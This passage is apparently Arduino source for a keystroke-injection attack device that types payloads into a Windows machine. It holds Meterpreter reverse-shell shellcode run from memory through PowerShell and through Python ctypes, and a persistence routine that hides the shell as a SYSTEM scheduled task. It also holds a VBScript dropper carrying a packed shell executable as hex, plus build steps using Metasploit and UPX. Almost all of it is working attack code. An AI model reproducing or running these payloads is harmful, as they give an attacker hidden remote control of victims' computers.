Keyboard.print(F("$p15=0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff;")); Keyboard.print(F("$p16=0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56;")); 
Keyboard.print(F("$p17=0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00;")); Keyboard.print(F("$p18=0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56;")); Keyboard.print(F("$p19=0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;")); Keyboard.print(F("[Byte[]];")); Keyboard.print(F("[Byte[]]$sc64 = $p01+$p02+$p03+$p04+$p05+$p06+$p07+$p08+$p09+$p10+$p11+$p12+$p13+$rhost+$p14+$rport+$p15+$p16+$p17+$p18+$p19;")); } Keyboard.print(F("[Byte[]]$sc = $sc64;$size = 0x1000;")); Keyboard.print(F("if ($sc.Length -gt 0x1000) {$size = $sc.Length};")); Keyboard.print(F("$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);")); Keyboard.print(F("for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};")); Keyboard.print(F("$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };")); } // Echos the inline_reverse_meterpreter into a file ( %WINDIR%\system.ps1), and runs it as a 10 minute scheduled task called Maint. // The task runs as SYSTEM, thus hiding the process from the active user. 
void win_persistentPowershellRevMeterpreter (void) { const char *psfilename = "system.ps1"; win_openCmd(); delay(500); Keyboard.print(F("echo ")); delay(700); win_powershellRevMeterpreter(); delay(1000); Keyboard.print(F(" > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(win_psscript_file_name); delay(700); Keyboard.println("exit"); delay(700); win_createPowerShellScheduledTask(); delay(2000); } /** windows reverse meterpreter (32-bit) shell in python either executed in memory or written to disk **/ void win_pyShell(boolean mem, char *path){ delay(1000); char *iphex = makeIPHex("python"); // converts ip address into hex, returns desired python format char *porthex = makePortHex("python", "met32"); // converts port into hex; returns desired python format if (mem == true){ win_openPythonPrompt(path); // if executing from memory, open the python prompt } else { win_openCmd(); // otherwise, create a python script delay(500); Keyboard.print(F("echo ")); } delay(1000); Keyboard.print("from ctypes import *; "); Keyboard.print("buf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\"; "); Keyboard.print("buf += \"\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\"; "); Keyboard.print("buf += \"\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\"; "); Keyboard.print("buf += \"\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\"; "); Keyboard.print(F("buf += 
\"\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68")); Keyboard.print(F(iphex)); Keyboard.print(F("\\x68\\x02\\x00")); Keyboard.print(F(porthex)); Keyboard.print("\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\"; "); Keyboard.print("buf += \"\\xd5\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x01\\xc3\\x29\\xc6\\x85\\xf6\\x75\\xec\\xc3\"; "); Keyboard.print("memorywithshell = create_string_buffer(buf, len(buf)); "); Keyboard.print("shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p)); "); if (mem == true){ Keyboard.println("shellcode()"); // execute in memory } else { Keyboard.print(F("shellcode() > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(F("shell.py")); // write script to file delay(200); Keyboard.println("exit"); } delete(iphex); // free up mem alloc delete(porthex); } /** Meterpreter Shell in vbscript creation instructions for minimal size exe: 1) generate c shellcode using metasploit, place in simple c program as unsigned char buf[] int main(){ int(*func)(); func = (int(*)()) buf; (int)(*func)(); }  2) wine gcc.exe -s shell.c -o shell.exe 3) upx -4 shell.exe 4) grab hex of shell.exe (hex editor of choice) and place in text file (shell.txt) 5) cat shell.txt | sed 's/\(.\{2\}\)/\1 /g' > newshell.txt -- take heed of trailing 00's may need to add if truncated This could definitely be compressed further by zipping all nulls and incorporating an unpack/unzip function in your vbscript though I chose to leave as-is **/ void win_vbscriptRevShell(boolean fromcmd) { delay(1000); win_openCmd(); makeIPHex("vbscript"); 
// converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *iphex = makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *porthex = makePortHex("vbscript", "met32"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' const char *filename = "shell.vbs"; delay(1000); Keyboard.print(F("echo hexstr = \"4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f ")); Keyboard.print(F("53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 ae 13 53 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 16 00 10 00 00 00 10 00 00 00 ")); Keyboard.print(F("90 00 00 c0 ab 00 00 00 a0 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 ")); Keyboard.print(F("03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 ad 00 00 18 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 ")); Keyboard.print(F("90 00 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 00 00 00 a0 00 00 00 0e 00 00 00 02 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 
00 10 00 00 00 b0 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 ")); Keyboard.print(F("c0 33 2e 30 38 00 55 50 58 21 0d 09 02 04 ed 38 35 fb 56 f6 f2 5b ce 83 00 00 a4 0b 00 00 00 1e 00 00 26 01 00 72 9d f9 ff ff 55 89 e5 53 83 ec 34 a1 64 30 40 00 85 ")); Keyboard.print(F("c0 74 1c c7 44 24 08 00 07 04 b6 db 7e 9f 02 04 24 0e ff d0 24 0c 0b 10 11 26 7d df ed fe e8 01 00 0b 24 50 05 04 64 04 05 44 c7 45 f0 22 8d 6d 5d fb b6 06 89 34 10 ")); Keyboard.print(F("a1 40 21 22 08 0c 0f f4 3f 36 f2 d7 06 08 48 04 50 40 50 3c 0a cc a1 30 50 df 7d ff 7e 6d 75 4a 0d d4 8b 15 44 32 10 0c 06 7c 83 e4 f0 dd fb fd 76 07 08 c4 19 dc 8b ")); Keyboard.print(F("48 08 a1 3e 08 04 fb 7b d7 be a1 40 89 47 1b 03 88 89 c3 22 e4 89 1c 0e 7b 7b 17 fb 0b 2c a3 43 24 8b 1d f8 60 09 8b 43 10 28 80 1d 8b 3d 0a ec 6c 19 43 30 13 27 bc ")); Keyboard.print(F("1d 32 50 e9 04 00 7a 90 0f 14 bb df 6e ed 8b 45 08 7c 01 3d 91 13 c0 77 3b 3d 8d 06 72 4c 11 46 08 c2 bb 01 18 20 04 28 bb 37 f7 7f 3a f4 83 f8 01 0f 84 ed 0d d3 0f ")); Keyboard.print(F("85 9a 07 31 c0 fc bd bb fd 83 c4 14 5b c9 c2 29 3d 94 3a 74 4d 3d 96 06 18 3d 93 60 cf df df 75 e1 eb b5 90 3d 05 10 3d 3d 1d d0 54 ac e1 61 2f 07 54 74 64 92 b3 14 ")); Keyboard.print(F("ee be bb 10 82 b8 ff 00 eb a5 90 31 db ab 01 2d 90 ed 0e 64 c0 35 0b 4a 86 84 79 ec 0b 16 cc 2b 18 39 34 54 b6 2c e6 12 16 12 46 d9 7c 6c 59 ca 0e c8 1b 62 1b 2d fb ")); Keyboard.print(F("24 ac 09 85 db 75 0a 59 e1 70 58 c3 12 1e 2e 66 5b 5a da 0d 7f 6e 18 2e 35 ff 15 f0 a7 e8 7c fd 2b 90 c1 1e c9 17 70 17 64 16 ec ed c2 fe 08 61 0f c9 ff e0 3f 0f 67 ")); Keyboard.print(F("bc 6c e4 fc 60 90 4f 00 30 95 34 7b 18 bf 86 52 2f 65 97 13 30 29 0b 3c 33 da 60 3c 9d 16 11 08 88 40 06 58 f7 8e 17 01 8b 0d 4c 33 85 c9 74 31 12 29 42 73 53 f6 1d ")); Keyboard.print(F("2a 2b 37 42 09 27 32 76 f6 c3 db 3a c9 c3 b8 78 eb a7 90 07 e2 8b 81 7c dd 00 51 31 25 48 4b c8 d9 db 2c 83 48 8d 76 00 43 e7 ae 74 6a 8d fe 22 09 01 3a 18 f6 9c e3 ")); Keyboard.print(F("\" 
> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"0c 00 20 ca 07 28 ef 8d 9b 5e d8 9a 0c e4 03 74 04 3f 16 8b 55 e6 18 8d 18 85 54 7d c9 b1 c9 70 ad 71 38 54 b8 5f 7c 3d 5b b1 ef 6e c9 cf 34 3d 40 fd 02 74 0a c7 05 ")); Keyboard.print(F("08 46 ec 5b 73 23 47 0e 12 48 74 3f 30 b1 bf db 0b 6d 34 67 bb 14 70 1f 81 fb 05 74 e4 9e ed ea 76 43 8b 03 b3 02 02 c3 04 15 75 ed 6f 48 5b c2 31 5c 10 e9 16 95 5c ")); Keyboard.print(F("23 60 89 ac 7f 0c b6 b4 fd cf bc 87 9c 9c 58 89 c2 35 20 20 c7 9d 0a dc dc c6 fb 9d 31 d0 a9 0b aa a4 34 24 0f a2 8d 5b cc 7d b6 98 0b 5c 0e f6 c6 ca f6 21 5b f7 07 ")); Keyboard.print(F("83 0d 34 ac 01 0b 80 02 f7 c2 1d 9b ec 39 ec 80 00 0e 04 00 29 08 0e 43 9a 0f 19 02 10 81 e2 04 db c3 9f ec 20 f6 c1 29 40 80 e5 20 75 30 7b 80 6b 3d 1f 7b f7 7e 06 ")); Keyboard.print(F("76 1e 79 0d 85 d2 78 23 38 40 74 0b 81 38 73 1f 62 2c 2e 90 5b c7 0e 80 b6 db 05 7b b0 c4 1a 33 eb d1 df db e3 e7 0b b3 de 70 56 70 10 8d 75 0c 89 34 40 9a f5 81 c2 ")); Keyboard.print(F("89 5c c1 57 17 00 3e a1 fd 8c 41 34 68 29 0a fc 89 74 1b 34 ba 6f b0 dc 1a ce 04 04 0c 4b 57 f8 6f dc fa 4c 4c eb 89 d6 a7 75 0b 8d 65 f4 5b 5e 5f 6c 01 f7 c5 33 4f ")); Keyboard.print(F("1c 47 65 c8 37 05 4a 0f 1c 89 4d 34 0b 6f a8 46 58 68 0b 48 8b 0c 4b 88 8c dc f1 85 b6 15 e5 c6 74 04 04 6f 8d 55 e4 36 63 6c cc 2e 8b 40 1b d4 39 42 73 6e b0 b7 8d ")); Keyboard.print(F("89 55 c0 41 4c be 36 42 dc 42 c3 bd 89 df f3 a4 3d 65 fe 84 40 1d b6 67 da 51 7b d9 41 1e e4 f1 63 d8 b0 84 40 3a a4 47 31 0c c3 5e 3e 0d 03 20 1f f6 a4 7b b3 fb 80 ")); Keyboard.print(F("05 4c e3 2c a1 38 c1 36 3a 0c 4b 67 0a 55 2c 3f b7 fd f0 1a a8 13 2d b8 14 31 08 2d 04 f8 fd d9 b7 86 07 7e dd bb 09 0b 7e 61 8b 3d 0a 85 ff 2d 14 f8 5e 1b 8b 35 18 ")); Keyboard.print(F("09 f6 53 a3 fb 0a 5c 30 fc 14 73 b6 be c0 20 7d e0 e4 ef d7 ed 17 72 f0 8b 10 03 13 e3 e0 b9 e2 89 fa 7b 75 d8 b3 85 98 9a 08 2a 72 dd 74 90 
6c ee 85 b7 14 1c 46 6c ")); Keyboard.print(F("13 bb 20 08 0f 13 c0 d6 e4 6e 0c 75 ae 41 6e a7 06 08 c3 27 9b fb ea 85 02 93 3c 0c 0f 83 4a 15 ed b7 6d 5f b8 6b 03 26 8b 88 b1 0a 8b 53 5b c1 f2 f6 dd e2 ff 6b 83 ")); Keyboard.print(F("fa 10 74 46 04 20 74 79 08 61 e1 5d a2 01 2c e4 00 81 44 04 06 8d c7 3f a4 e8 90 0f b6 38 f7 c7 56 0b c3 3f f6 ee 81 cf 00 50 29 cf 81 ef bf 34 37 89 75 e4 eb 2c f3 ")); Keyboard.print(F("df b7 1f 6e 0f b7 23 7b 75 61 1d 89 f9 81 e9 1f 01 b8 79 be 85 f1 b6 e4 64 61 23 75 2b b9 fb 76 cc 70 33 ec e5 eb 1c fa 29 ca 81 ea 2c 1b 16 59 18 f2 02 e4 1d c6 7b ")); Keyboard.print(F("02 3f 82 5c 39 d8 0f 87 38 b7 06 8e 6b ec 75 24 9d 84 00 b9 33 56 20 49 77 98 c5 fa c3 b4 e5 1e dc 41 9f 48 21 fe ca 1a 47 30 b6 71 ac 35 0f 8d 50 a2 15 18 40 e1 c3 ")); Keyboard.print(F("8a f1 49 e9 c3 9b 1d a4 1b ce ef 85 1b bc fb ff 74 22 3e 74 0c f7 ff 14 9d 11 63 1d 7b e0 4b 75 f6 70 18 5e 02 98 6d c3 78 7f e9 06 fb eb 02 0e 8d 43 01 8b 14 85 24 ")); Keyboard.print(F("b1 30 0c 6e 9d f0 eb c8 1b bd 3c e0 cd 58 e0 45 d2 04 3f 0d 8e 14 81 47 0c eb 93 90 3f 9b a1 44 b5 c2 c6 31 6a 75 07 9c f8 f5 29 7b db 13 d8 65 48 50 b5 54 51 8d 60 ")); Keyboard.print(F("1d 88 df 07 63 61 2a fb 03 d6 5c 52 89 c6 07 64 f0 42 73 74 34 0c 62 67 e8 89 34 24 1d b0 0e 76 42 5b 08 f1 d7 40 6c 50 d6 61 cb 82 54 df 6e 08 e3 de e4 c9 f1 8b 5d ")); Keyboard.print(F("fc 63 07 0c 9c c0 57 43 fb 36 14 d3 30 37 05 03 f6 4e 76 d8 ab 89 43 59 94 50 a1 93 14 b7 03 8b b5 1c 9c 6e 53 54 eb a9 b0 87 70 16 18 a2 4f 5d 08 72 26 cc 10 e4 09 ")); Keyboard.print(F("0b e3 15 97 0a 37 46 d2 8e 8b 02 f8 3b eb 42 d6 bd c0 6f eb 08 39 d9 74 1e 9e 8b 42 08 37 f1 62 81 ed 61 07 52 b7 8b 48 80 4a db ac 3b 61 07 0b 1c 22 eb db 38 a3 a5 ")); Keyboard.print(F("81 61 30 7b d0 eb dd fb ab 71 0c 76 3b 78 3e 72 14 b2 75 05 2b 08 e8 9d 1a 63 b1 c3 1f 0e aa 48 11 3e 60 ef 15 ac 08 00 58 74 50 eb d0 62 cd 0e d6 bb cd 74 13 23 10 ")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where 
script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"1b db 84 cd 44 d7 7c 85 de 3b 25 64 90 ae 81 e4 74 90 07 ec e8 20 27 07 19 f4 00 61 18 83 0c 32 c8 14 1c 04 0c 0d 36 c8 20 10 d0 3f b8 32 c8 20 83 07 c0 c4 dc c8 20 ")); Keyboard.print(F("83 0c d8 b4 d4 20 83 0c 32 bc cc b0 df c7 84 c8 c8 2f e8 b8 d2 13 7c 78 22 18 f4 f6 90 dd 88 1b 02 2c f6 26 1c 0b 08 00 9b ea 1e 02 fc e8 89 05 60 a5 d2 64 8b 1b 94 ")); Keyboard.print(F("ed 8b 52 30 02 0c 41 72 28 6b fe ff 0b 7c 4a 26 31 ff f9 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 e0 06 6f d4 1d 1b 42 3c 01 f9 40 78 2f d0 60 6b 91 4a 08 50 ")); Keyboard.print(F("15 e6 58 20 01 ff 63 b1 ff d3 e3 3c 49 8b 34 8b 01 d6 35 2f 38 e0 75 f4 03 7d f8 3b 7d 97 ed cb f6 24 75 e2 58 23 24 66 8b 0c 4b 08 1c 8b 04 ff ff 5d 6c 29 d0 40 24 ")); Keyboard.print(F("5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 06 fe ff ed 68 33 32 8e 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 eb d7 6d bf c4 29 c4 04 68 29 80 6b 00 0f 50 00 ")); Keyboard.print(F("40 01 6f f1 bf 7d 68 ea 0f df e0 0e 97 6a 05 68 ")); Keyboard.print(F(iphex)); // remote ip Keyboard.print(F(" 68 9c ")); Keyboard.print(F(porthex)); // remote port Keyboard.print(F(" 89 dd b5 42 ff e6 6a 10 56 57 68 99 a5 0d 19 9f 0c ff 4e de 7d fb 0b 0e ec 68 f0 b5 a2 56 0f ")); Keyboard.print(F("6a 00 6a 04 1c 02 d9 c8 5f 6f 5b ab df 0c 8b 36 6a 40 68 1e 59 56 16 68 58 a4 c3 5a b4 db 53 e5 12 93 53 0a 1f 20 23 61 2b f1 01 c3 29 c6 ea 3c c3 31 0d 44 60 61 00 ")); Keyboard.print(F("8f 9a b4 aa 2a 0b 02 9f 00 47 11 91 8c 6c ff ff ff ff 69 62 67 63 63 5f 73 5f 64 77 32 2d 31 2e 64 6c 6c 00 5f 5f 72 65 67 69 73 74 65 72 5f 66 72 61 3f db ce fe 6d ")); Keyboard.print(F("65 5f 69 6e 66 6f 28 6a 22 32 23 4a 76 5f 52 c0 76 ff 60 25 43 6c 61 73 73 65 73 37 64 65 39 fe db 56 3c 00 e0 cd 4d 0a 67 77 20 72 75 6e 74 69 fb ff db df 17 20 66 ")); Keyboard.print(F("61 69 6c 75 2b 3a 0a 00 20 20 56 69 72 74 75 61 6c 51 75 35 76 f9 76 6c 79 18 65 64 06 6f 72 20 25 
62 79 4a b7 b5 76 fb 73 20 61 74 02 64 64 2d 64 13 70 b3 df de fe ")); Keyboard.print(F("b7 33 55 6e 6b 6e 6f 77 6e 20 70 77 75 64 6f 56 65 6c 6f 63 6d df ee 6e 26 69 6f 11 72 6f 74 0b 6f 6c 20 76 4e 73 b5 43 d9 ed 10 46 2e 0a 33 62 69 61 55 95 0d b9 2b ")); Keyboard.print(F("7a 65 00 83 a8 48 46 c0 7f 7b b0 14 07 01 7a 52 03 7c 08 01 1b 0c 04 04 88 be a1 70 4b 70 20 13 ab 9c d2 ff ff 8b 4c 76 ff ff 20 41 0e 08 85 02 42 0d 05 02 78 0a c5 ")); Keyboard.print(F("23 41 0b 0e 64 db 01 f5 04 d3 23 43 75 11 e6 80 c6 22 44 31 5f 1d 48 f7 bd 5b 03 0c 3b 1e 5a 96 47 d9 ec 3a 33 3b cc da 19 55 b6 e4 40 55 00 aa 2a 19 55 46 55 95 8c ")); Keyboard.print(F("d9 03 0a 4a f8 62 11 cb 46 76 1b 00 44 63 11 00 4d d3 34 db 24 61 03 3c 54 62 72 86 34 4d d3 34 98 b4 cc ea f8 4d d7 0d d6 0a 5b 1a 07 2a 03 3a 48 34 4d d3 34 5a 64 ")); Keyboard.print(F("6c 76 82 d3 34 4d d3 8a 94 9e a6 b0 36 a0 2c 58 ba 3f 73 00 50 d8 04 44 60 03 5b 91 1d b2 00 14 60 03 00 81 8c aa 2a 9b 00 46 15 9f ac 13 54 55 19 10 bf bf a0 aa 2c ")); Keyboard.print(F("00 19 80 40 00 05 17 88 ba 1c 03 20 44 04 70 ca 42 55 95 03 00 76 15 ab a8 be b0 50 fe ff 97 20 63 44 65 6c 65 74 65 43 72 69 74 69 63 61 6c 53 65 63 02 ba 99 80 1a ")); Keyboard.print(F("16 45 6e a0 6f 53 66 e1 15 78 10 50 72 6f 63 b6 bf 6d 25 93 0c 47 37 4c 61 73 74 45 72 10 72 b1 ed db c7 0d 4d 6f 64 75 4c 48 61 6e 64 05 41 11 dd 22 01 7d 2b 41 c3 ")); Keyboard.print(F("0f 49 6e ca 4a 40 cd 4d 4c 70 57 d8 b7 95 7d 4c 65 61 76 15 08 74 55 6e 68 4e 80 fb db da 64 79 74 70 16 46 69 6c 99 da ad bb 01 57 6c 73 60 56 2e 75 65 0c cc 75 b3 ")); Keyboard.print(F("80 4b 6e 74 3c 0f ba ed 05 94 5b e3 6d eb e4 db f7 df 7e 5f 5f 67 32 6d 61 69 6e 61 72 67 73 0e 70 02 65 6f 3b f6 da 6e 76 2c 6d 0d 66 6d c3 65 0b ae bd b7 b7 73 28 ")); Keyboard.print(F("5f 61 70 11 74 79 70 0f 7c f9 05 6b 6e 73 07 80 62 05 2e 0e d9 ae f0 cc 25 30 61 62 03 10 61 74 18 ed da d6 ba c5 6c f9 07 66 f9 1c 66 77 b4 b7 ed ce d9 07 73 69 67 ")); Keyboard.print(F("\" >> ")); 
Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"79 6c 07 76 66 70 10 fc b7 27 2c 5f 66 89 50 45 03 4c 01 08 00 74 ae 13 53 17 d5 ff 21 9d e0 00 0f 03 0b 01 02 16 00 2e 75 17 aa 5c 1a 03 81 6c 12 07 10 43 84 21 c2 ")); Keyboard.print(F("03 7e 7f 95 0b c2 3d 0b 17 f8 3b 84 08 13 15 00 90 0c 6f 36 b6 3d ab 07 15 03 10 20 2b 04 3a 66 c9 62 07 06 00 0a 50 b6 5d 90 cd 28 00 80 02 18 13 8d ac eb 46 00 b0 ")); Keyboard.print(F("57 74 14 22 3e c3 80 00 2e 2b 1f b8 08 11 ef 39 2e 90 eb c5 d7 2d 7c 5b 42 30 60 2e 64 55 61 0b 50 e4 09 73 54 bd fb 8d c0 90 ef ec 0f 0d 60 c0 2e 72 28 14 27 30 a0 ")); Keyboard.print(F("9f b0 43 33 27 30 40 2e 65 68 22 66 b3 8f a5 d4 10 27 73 1c 58 30 72 27 62 b4 00 1b b6 b0 af 78 04 50 1f 00 fa a7 08 93 6d 30 77 69 43 56 de cf 85 7d c3 16 27 40 43 ")); Keyboard.print(F("52 54 0b f0 1c 41 11 2b cf 77 c4 8e 05 ec db 00 27 74 6c 77 e2 b9 aa 22 e6 19 27 d8 0b 98 23 f6 00 27 1b 00 00 68 bb 00 8a 81 03 24 00 00 00 ff 00 00 00 00 00 00 00 ")); Keyboard.print(F("60 be 15 a0 40 00 8d be eb 6f ff ff 57 83 cd ff eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00 01 db 75 07 8b 1e 83 ")); Keyboard.print(F("ee fc 11 db 11 c0 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 31 c9 83 e8 03 72 0d c1 e0 08 8a 06 46 83 f0 ff 74 74 89 c5 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 ")); Keyboard.print(F("db 75 07 8b 1e 83 ee fc 11 db 11 c9 75 20 41 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 83 c1 02 81 fd 00 f3 ff ff 83 d1 01 ")); Keyboard.print(F("8d 14 2f 83 fd fc 76 0f 8a 02 42 88 07 47 49 75 f7 e9 63 ff ff ff 90 8b 02 83 c2 04 89 07 83 c7 04 83 e9 04 77 f1 01 cf e9 4c ff ff ff 5e 89 f7 b9 46 00 00 00 8a 07 ")); Keyboard.print(F("47 2c e8 3c 01 77 f7 80 3f 01 75 f2 8b 07 8a 5f 04 66 c1 e8 08 c1 c0 10 86 c4 29 f8 80 eb e8 01 f0 89 07 83 c7 05 88 d8 e2 d9 8d be 00 80 00 00 8b 
07 09 c0 74 3c 8b ")); Keyboard.print(F("5f 04 8d 84 30 00 a0 00 00 01 f3 50 83 c7 08 ff 96 3c a0 00 00 95 8a 07 47 08 c0 74 dc 89 f9 57 48 f2 ae 55 ff 96 40 a0 00 00 09 c0 74 07 89 03 83 c3 04 eb e1 ff 96 ")); Keyboard.print(F("50 a0 00 00 8b ae 44 a0 00 00 8d be 00 f0 ff ff bb 00 10 00 00 50 54 6a 04 53 57 ff d5 8d 87 9f 01 00 00 80 20 7f 80 60 28 7f 58 50 54 50 53 57 ff d5 58 8d 9e 00 f0 ")); Keyboard.print(F("ff ff 8d bb 69 ad 00 00 57 31 c0 aa 59 49 50 6a 01 53 ff d1 61 8d 44 24 80 6a 00 39 c4 75 fa 83 ec 80 e9 04 65 ff ff eb 1a 56 be 04 70 40 00 fc ad 85 c0 74 0d 6a 03 ")); Keyboard.print(F("59 ff 74 24 10 e2 fa ff d0 eb ee 5e c2 0c 00 00 a0 ad 40 00 a3 ad 40 00 20 50 40 00 a4 ad 40 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ad 40 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b0 00 00 3c b0 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 6d b0 00 00 58 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b0 00 00 86 b0 00 00 96 b0 00 00 a6 b0 00 00 b4 b0 00 00 c2 b0 00 00 ")); Keyboard.print(F("00 00 00 00 d0 b0 00 00 00 00 00 00 4b 45 52 4e 45 4c 33 32 2e 44 4c 4c 00 6d 73 76 63 72 74 2e 64 6c 6c 00 00 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 47 65 74 ")); Keyboard.print(F("50 72 6f 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 00 00 56 69 72 74 75 61 6c 41 6c 6c 6f 63 00 00 56 69 72 74 75 61 6c 46 72 65 65 00 ")); Keyboard.print(F("00 00 45 78 69 74 50 72 6f 63 65 73 73 00 00 00 5f 69 6f 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where 
